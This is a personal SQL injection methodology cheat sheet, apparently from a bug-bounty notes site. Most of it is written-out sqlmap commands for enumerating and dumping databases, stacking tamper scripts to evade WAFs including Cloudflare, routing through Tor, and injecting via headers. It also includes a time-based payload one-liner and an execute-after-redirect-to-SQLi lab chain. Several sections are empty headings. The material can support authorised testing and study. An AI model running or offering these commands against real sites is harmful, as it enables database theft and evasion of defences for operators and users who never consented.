search

🚩My SQL injection Methodology

hashtag
-------------------------------------------------------------

hashtag
-------------------------------------------------------------

hashtag
Automated SQL INJECTION Finding Waybackurls | SQLMAP

  1. /root/go/bin/waybackurls http://testphp.vulnweb.com >> /home/kali/file.txt

  2. cat /home/kali/file.txt | /root/go/bin/gf sqli

  3. sqlmap -m sqlitest.txt --level 5 --risk 3 --batch --dbs --tamper=between

hashtag
-------------------------------------------------------------

hashtag
PHP EAR (Execute After Redirect) To SQLi

  1. Found PHP EAR Vulnerability by checking the content leanth on ffuf results.

  2. Added Match and Replace Location Header rule in Burp Suite to Stop the Redirect to Login Page.

  3. Found an employee search page. (Access Control issue)

  4. Employee search page was Vulnerable to SQLi.

  5. Run sqlmap and Dumped the database.

  6. Commands POC

  7. ffuf -u https://bsides.kuldeep.io/FUZZ.php -w raft-small-words.txt -fc 403

  8. add Match and Replace Rule to remove Location Header in Response body

  9. Type: Response Header

  10. Match: Location: index.php

  11. sqlmap -u http://bsides.kuldeep.io/esearch.php --method POST --data search_term=1

  12. sqlmap -u http://bsides.kuldeep.io/esearch.php --method POST --data search_term=1 --dbs

hashtag
-------------------------------------------------------------

hashtag
Automated SQL INJECTION Finding using | Jeeves

echo "https://exampl.comarrow-up-right" | gf sqli | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 10

hashtag
(1) One-Liner SQLi Finding

hashtag
-------------------------------------------------------------

hashtag
(2) One-Liner SQLi Finding

hashtag
------------------------------------------------------------

hashtag
(3) One-Liner SQLi-TimeBased Finding

hashtag
------------------------------------------------------------

hashtag
(4) One-Liner Subdomains SQLI Finding

hashtag
------------------------------------------------------------

hashtag
Bypass WAF using TOR

hashtag
-----------------------------------------------------------

hashtag
SQLMAP Attacks

hashtag
Steps to Produce Commands to Sqlmap

  1. sqlmap -r request.txt

  2. sqlmap -r request.txt --dbs

  3. sqlmap -r request.txt -D (DB Name) --tables

  4. sqlmap -r request.txt -D (DB Name) -T (Table Name) --dump

hashtag
-----------------------------------------------------------

hashtag
SQLI Paylods Wordlist

hashtag
----------------------------------------------------------

hashtag
What's your flow for the detection SQLI

I tried many ways but was unsuccessful.

1. use the burp live scanner only to check sqli

2. use time base payload list on burp intruder and check the length/response complete/etc

3. Capture the requests that might be interesting and directly put them in sqlmap

hashtag
-----------------------------------------------------------

Test SQLi GET, POST URL, Cookie, User-Agent, X-Forwaded-For Custom Harder in Request

Try Sqlmap --wizard

sqlmap -r loginRequest.txt -p username

sqlmap -r request.txt --level 3 --risk 2 -p number -a

hashtag
-----------------------------------------------------------

hashtag
(Blind SQLI) SQLMAP Bypass Cloudflare WAF - Database Takeover

sqlmap -r request.txt --dbs --risk=1 --level=3 --temper=between,tofla

hashtag
-----------------------------------------------------------

hashtag
SQLMap Tamper Scripts (SQL Injection and WAF bypass)

These are some targeted tamper sets by DBMS type, good to have handy when testing;

General Tamper testing:

MSSQL:

MySQL:

hashtag
-----------------------------------------------------------

hashtag
What I use for MySQL Enumeration and DB hacking is:

-(minus minus-tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

If you have any issues make sure your setting these values:

–level 3 –risk 3 –flush-session –random-agent ← This is almost critical from my exp.

Remember, always try to point sqlmap to a specific GET parameter with ‘-p <paramname’ for instance if URL Example Domain 70arrow-up-right sqlmap -p item

One additional thing that has helped me, is add -a at the end, so it dumps anything it finds in the DB

hashtag
-----------------------------------------------------------

hashtag
# Bypass WAF SQLMAP

hashtag
Example:

sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs $ sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs

sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs $ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --dbs --technique=T $ sqlmap -u "sitetarget.com/admin/login_action" method="POST" --data="uname=admin*&pass=admin&captcha=123456" --cookie="input cookie" --headers="input field header" --dbs --technique=T

Example Bypass WAF SQLMap New Version Update :

sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs $ sqlmap -u "Target.com" --random-agent -v 3 --dbs $ sqlmap -u "Target.com" --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs $ sqlmap -u "http://sitetarget.com/login" --data="userid=admin&passwd=admin" --method POST --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 --dbs $ sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbs

example dump DB use POC HTTP post request :

sqlmap -r poc.txt --threads=10 --random-agent --level=5 --risk=3 --tamper=space2comment,between --dbms=MySQL -D database_target --tables

example WAF Header :

sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --drop-set-cookie --dbms=mysql --dbs $ sqlmap -u https://target.com/vote/check_vote.php --headers="X-Forwarded-For:1*" -p X-Forwarded-For --level=5 --risk=3 --tamper="space2comment,between,randomcase" --technique="BEUST" --no-cast --random-agent --dbs

example WAF CloudFlare use proxy Tor default :

sqlmap -u "https://target.com" --data="id=63665%20RLIKE%20-bla-blablabla" --time-sec=20 --random-agent --level=5 --risk=3 --tamper="space2comment,between,randomcase,charencode" --technique=BEUST --privileges --no-cast --tor --tor-port=9050 --tor-type=socks5 --check-tor --banner --union-char=1 --dbms=MySQL --dbs

hashtag
-----------------------------------------------------------

hashtag
Login Page Exploit Method

PreviousDDOS Using SQL injectionNextResources

Last updated